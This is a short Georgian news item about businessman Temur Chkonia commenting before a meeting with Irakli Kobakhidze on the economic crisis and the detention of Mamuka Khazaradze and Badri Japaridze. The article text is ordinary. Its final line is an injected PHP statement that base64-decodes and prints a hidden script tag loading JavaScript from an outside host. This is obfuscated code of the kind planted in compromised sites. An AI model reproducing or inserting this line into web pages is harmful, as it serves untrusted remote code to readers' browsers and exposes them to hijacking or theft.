gorgia
გარე ავეჯი

არ მგონია, კრიზისის თემა ერთ საათში წყდებოდეს, - ამის შესახებ ბიზნესმენმა თემურ ჭყონიამ მთავრობის ადმინისტრაციაში ირაკლი კობახიძესთან ბიზნესის შეხვედრამდე მედიასთან საუბრისას განაცხადა.

„ჩემი სათქმელისთვის არ ვარ დაბარებული მე მგონი, მე იმდენი რამე მაწუხებს, რომ ერთი შეხვედრა არ ეყოფა. არ მგონია კრიზისის თემა ერთ საათში წყდებოდეს“, - აღნიშნა მან.

მან ჟურნალისტების მიერ მამუკა ხაზარაძისა და ბადრი ჯაფარიძის დაკავების შესახებ დასმულ კითხვასაც უპასუხა და აღნიშნა რომ ეს ბიზნესზე ცუდად იმოქმედებს.

"ჩემი ორი მეგობარი რომაა დაკავებული, შეწუხებული ვარ“, - აღნიშნა ჭყონიამ.

ცნობისთვის, მთავრობის ადმინისტრაციაში ირაკლი კობახიძის და ბიზნესის წარმომადგენლების შეხვედრა იწყება. ამ წუთებში ბიზნესმენები შეხვედრაზე შედიან. მათმა ნაწილმა შესვლამდე მედიასთან მოკლე კომენტარები გააკეთეს, თუმცა კერძო სექტორის წარმომადგენლების დიდი ნაწილი თავს იკავებს.

ბიზნესმენთა ნაწილი აცხადებს, რომ ჯერ არ იციან, რაზე იქნება შეხვედრაზე საუბარი.

173
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");